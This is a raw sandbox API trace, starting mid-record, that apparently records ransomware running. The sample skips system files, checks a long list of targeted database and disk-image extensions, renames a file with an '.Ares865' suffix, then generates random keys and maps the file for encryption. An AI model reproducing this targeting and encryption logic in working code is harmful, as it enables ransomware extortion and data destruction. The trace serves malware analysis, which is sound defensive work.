ftLastWriteTime.dwLowDateTime=0xce1c836a, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="aoldtz.exe") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2=".") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="..") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="windows") returned -1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="bootmgr") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="temp") returned -1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="pagefile.sys") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="boot") returned 1 [0063.727] lstrcmpiW (lpString1="Stars.htm", lpString2="ids.txt") returned 1 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2="ntuser.dat") returned 1 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2="perflogs") returned 1 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2="MSBuild") returned 1 [0063.728] lstrlenW (lpString="Stars.htm") returned 9 [0063.728] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 83 [0063.728] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Stars.htm" | out: lpString1="Stars.htm") returned="Stars.htm" [0063.728] lstrlenW (lpString="Stars.htm") returned 9 [0063.728] lstrlenW (lpString="Ares865") returned 7 [0063.728] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0063.728] lstrlenW (lpString=".dll") returned 4 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2=".dll") returned 1 [0063.728] lstrlenW (lpString=".lnk") returned 4 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2=".lnk") returned 1 [0063.728] lstrlenW (lpString=".ini") returned 4 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2=".ini") returned 1 [0063.728] lstrlenW (lpString=".sys") returned 4 [0063.728] lstrcmpiW (lpString1="Stars.htm", lpString2=".sys") returned 1 [0063.728] lstrlenW (lpString="Stars.htm") returned 9 [0063.728] lstrlenW (lpString="bak") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.728] lstrlenW (lpString="ba_") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.728] lstrlenW (lpString="dbb") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.728] lstrlenW (lpString="vmdk") returned 4 [0063.728] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.728] lstrlenW (lpString="rar") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.728] lstrlenW (lpString="zip") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.728] lstrlenW (lpString="tgz") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.728] lstrlenW (lpString="vbox") returned 4 [0063.728] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.728] lstrlenW (lpString="vdi") returned 3 [0063.728] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.728] lstrlenW (lpString="vhd") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.729] lstrlenW (lpString="vhdx") returned 4 [0063.729] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.729] lstrlenW (lpString="avhd") returned 4 [0063.729] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.729] lstrlenW (lpString="db") returned 2 [0063.729] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.729] lstrlenW (lpString="db2") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.729] lstrlenW (lpString="db3") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.729] lstrlenW (lpString="dbf") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.729] lstrlenW (lpString="mdf") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.729] lstrlenW (lpString="mdb") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.729] lstrlenW (lpString="sql") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.729] lstrlenW (lpString="sqlite") returned 6 [0063.729] lstrcmpiW (lpString1="rs.htm", lpString2="sqlite") returned -1 [0063.729] lstrlenW (lpString="sqlite3") returned 7 [0063.729] lstrcmpiW (lpString1="ars.htm", lpString2="sqlite3") returned -1 [0063.729] lstrlenW (lpString="sqlitedb") returned 8 [0063.729] lstrcmpiW (lpString1="tars.htm", lpString2="sqlitedb") returned 1 [0063.729] lstrlenW (lpString="xml") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.729] lstrlenW (lpString="$er") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.729] lstrlenW (lpString="4dd") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.729] lstrlenW (lpString="4dl") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.729] lstrlenW (lpString="^^^") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.729] lstrlenW (lpString="abs") returned 3 [0063.729] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.730] lstrlenW (lpString="abx") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.730] lstrlenW (lpString="accdb") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.730] lstrlenW (lpString="accdc") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.730] lstrlenW (lpString="accde") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.730] lstrlenW (lpString="accdr") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.730] lstrlenW (lpString="accdt") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.730] lstrlenW (lpString="accdw") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.730] lstrlenW (lpString="accft") returned 5 [0063.730] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.730] lstrlenW (lpString="adb") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.730] lstrlenW (lpString="adb") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.730] lstrlenW (lpString="ade") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.730] lstrlenW (lpString="adf") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.730] lstrlenW (lpString="adn") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.730] lstrlenW (lpString="adp") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.730] lstrlenW (lpString="alf") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.730] lstrlenW (lpString="ask") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.730] lstrlenW (lpString="btr") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.730] lstrlenW (lpString="cat") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.730] lstrlenW (lpString="cdb") returned 3 [0063.730] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.731] lstrlenW (lpString="ckp") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.731] lstrlenW (lpString="cma") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.731] lstrlenW (lpString="cpd") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.731] lstrlenW (lpString="dacpac") returned 6 [0063.731] lstrcmpiW (lpString1="rs.htm", lpString2="dacpac") returned 1 [0063.731] lstrlenW (lpString="dad") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.731] lstrlenW (lpString="dadiagrams") returned 10 [0063.731] lstrlenW (lpString="daschema") returned 8 [0063.731] lstrcmpiW (lpString1="tars.htm", lpString2="daschema") returned 1 [0063.731] lstrlenW (lpString="db-journal") returned 10 [0063.731] lstrlenW (lpString="db-shm") returned 6 [0063.731] lstrcmpiW (lpString1="rs.htm", lpString2="db-shm") returned 1 [0063.731] lstrlenW (lpString="db-wal") returned 6 [0063.731] lstrcmpiW (lpString1="rs.htm", lpString2="db-wal") returned 1 [0063.731] lstrlenW (lpString="dbc") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.731] lstrlenW (lpString="dbs") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.731] lstrlenW (lpString="dbt") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.731] lstrlenW (lpString="dbv") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.731] lstrlenW (lpString="dbx") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.731] lstrlenW (lpString="dcb") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.731] lstrlenW (lpString="dct") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.731] lstrlenW (lpString="dcx") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.731] lstrlenW (lpString="ddl") returned 3 [0063.731] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.731] lstrlenW (lpString="dlis") returned 4 [0063.731] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.732] lstrlenW (lpString="dp1") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.732] lstrlenW (lpString="dqy") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.732] lstrlenW (lpString="dsk") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.732] lstrlenW (lpString="dsn") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.732] lstrlenW (lpString="dtsx") returned 4 [0063.732] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.732] lstrlenW (lpString="dxl") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.732] lstrlenW (lpString="eco") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.732] lstrlenW (lpString="ecx") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.732] lstrlenW (lpString="edb") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.732] lstrlenW (lpString="epim") returned 4 [0063.732] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.732] lstrlenW (lpString="fcd") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.732] lstrlenW (lpString="fdb") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.732] lstrlenW (lpString="fic") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.732] lstrlenW (lpString="flexolibrary") returned 12 [0063.732] lstrlenW (lpString="fm5") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.732] lstrlenW (lpString="fmp") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.732] lstrlenW (lpString="fmp12") returned 5 [0063.732] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.732] lstrlenW (lpString="fmpsl") returned 5 [0063.732] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.732] lstrlenW (lpString="fol") returned 3 [0063.732] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.733] lstrlenW (lpString="fp3") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.733] lstrlenW (lpString="fp4") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.733] lstrlenW (lpString="fp5") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.733] lstrlenW (lpString="fp7") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.733] lstrlenW (lpString="fpt") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.733] lstrlenW (lpString="frm") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.733] lstrlenW (lpString="gdb") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.733] lstrlenW (lpString="gdb") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.733] lstrlenW (lpString="grdb") returned 4 [0063.733] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.733] lstrlenW (lpString="gwi") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.733] lstrlenW (lpString="hdb") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.733] lstrlenW (lpString="his") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.733] lstrlenW (lpString="ib") returned 2 [0063.733] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.733] lstrlenW (lpString="idb") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.733] lstrlenW (lpString="ihx") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.733] lstrlenW (lpString="itdb") returned 4 [0063.733] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.733] lstrlenW (lpString="itw") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.733] lstrlenW (lpString="jet") returned 3 [0063.733] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.733] lstrlenW (lpString="jtx") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.734] lstrlenW (lpString="kdb") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.734] lstrlenW (lpString="kexi") returned 4 [0063.734] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.734] lstrlenW (lpString="kexic") returned 5 [0063.734] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.734] lstrlenW (lpString="kexis") returned 5 [0063.734] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.734] lstrlenW (lpString="lgc") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.734] lstrlenW (lpString="lwx") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.734] lstrlenW (lpString="maf") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.734] lstrlenW (lpString="maq") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.734] lstrlenW (lpString="mar") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.734] lstrlenW (lpString="marshal") returned 7 [0063.734] lstrcmpiW (lpString1="ars.htm", lpString2="marshal") returned -1 [0063.734] lstrlenW (lpString="mas") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.734] lstrlenW (lpString="mav") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.734] lstrlenW (lpString="maw") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.734] lstrlenW (lpString="mdbhtml") returned 7 [0063.734] lstrcmpiW (lpString1="ars.htm", lpString2="mdbhtml") returned -1 [0063.734] lstrlenW (lpString="mdn") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.734] lstrlenW (lpString="mdt") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.734] lstrlenW (lpString="mfd") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.734] lstrlenW (lpString="mpd") returned 3 [0063.734] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.735] lstrlenW (lpString="mrg") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.735] lstrlenW (lpString="mud") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.735] lstrlenW (lpString="mwb") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.735] lstrlenW (lpString="myd") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.735] lstrlenW (lpString="ndf") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.735] lstrlenW (lpString="nnt") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.735] lstrlenW (lpString="nrmlib") returned 6 [0063.735] lstrcmpiW (lpString1="rs.htm", lpString2="nrmlib") returned 1 [0063.735] lstrlenW (lpString="ns2") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.735] lstrlenW (lpString="ns3") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.735] lstrlenW (lpString="ns4") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.735] lstrlenW (lpString="nsf") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.735] lstrlenW (lpString="nv") returned 2 [0063.735] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.735] lstrlenW (lpString="nv2") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.735] lstrlenW (lpString="nwdb") returned 4 [0063.735] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.735] lstrlenW (lpString="nyf") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.735] lstrlenW (lpString="odb") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.735] lstrlenW (lpString="odb") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.735] lstrlenW (lpString="oqy") returned 3 [0063.735] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.736] lstrlenW (lpString="ora") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.736] lstrlenW (lpString="orx") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.736] lstrlenW (lpString="owc") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.736] lstrlenW (lpString="p96") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.736] lstrlenW (lpString="p97") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.736] lstrlenW (lpString="pan") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.736] lstrlenW (lpString="pdb") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.736] lstrlenW (lpString="pdm") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.736] lstrlenW (lpString="pnz") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.736] lstrlenW (lpString="qry") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.736] lstrlenW (lpString="qvd") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.736] lstrlenW (lpString="rbf") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.736] lstrlenW (lpString="rctd") returned 4 [0063.736] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.736] lstrlenW (lpString="rod") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.736] lstrlenW (lpString="rodx") returned 4 [0063.736] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.736] lstrlenW (lpString="rpd") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.736] lstrlenW (lpString="rsd") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.736] lstrlenW (lpString="sas7bdat") returned 8 [0063.736] lstrcmpiW (lpString1="tars.htm", lpString2="sas7bdat") returned 1 [0063.736] lstrlenW (lpString="sbf") returned 3 [0063.736] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.737] lstrlenW (lpString="scx") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.737] lstrlenW (lpString="sdb") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.737] lstrlenW (lpString="sdc") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.737] lstrlenW (lpString="sdf") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.737] lstrlenW (lpString="sis") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.737] lstrlenW (lpString="spq") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.737] lstrlenW (lpString="te") returned 2 [0063.737] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.737] lstrlenW (lpString="teacher") returned 7 [0063.737] lstrcmpiW (lpString1="ars.htm", lpString2="teacher") returned -1 [0063.737] lstrlenW (lpString="tmd") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.737] lstrlenW (lpString="tps") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.737] lstrlenW (lpString="trc") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.737] lstrlenW (lpString="trc") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.737] lstrlenW (lpString="trm") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.737] lstrlenW (lpString="udb") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.737] lstrlenW (lpString="udl") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.737] lstrlenW (lpString="usr") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.737] lstrlenW (lpString="v12") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.737] lstrlenW (lpString="vis") returned 3 [0063.737] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.737] lstrlenW (lpString="vpd") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.738] lstrlenW (lpString="vvv") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.738] lstrlenW (lpString="wdb") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.738] lstrlenW (lpString="wmdb") returned 4 [0063.738] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.738] lstrlenW (lpString="wrk") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.738] lstrlenW (lpString="xdb") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.738] lstrlenW (lpString="xld") returned 3 [0063.738] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.738] lstrlenW (lpString="xmlff") returned 5 [0063.738] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.738] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865") returned 88 [0063.738] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.htm.ares865"), dwFlags=0x1) returned 1 [0063.739] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\stars.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.739] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=230) returned 1 [0063.739] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.739] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.739] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.739] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.740] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.740] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.740] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.742] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.745] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.746] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.746] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.746] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.747] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.747] CloseHandle (hObject=0x164) returned 1 [0063.747] CloseHandle (hObject=0x154) returned 1 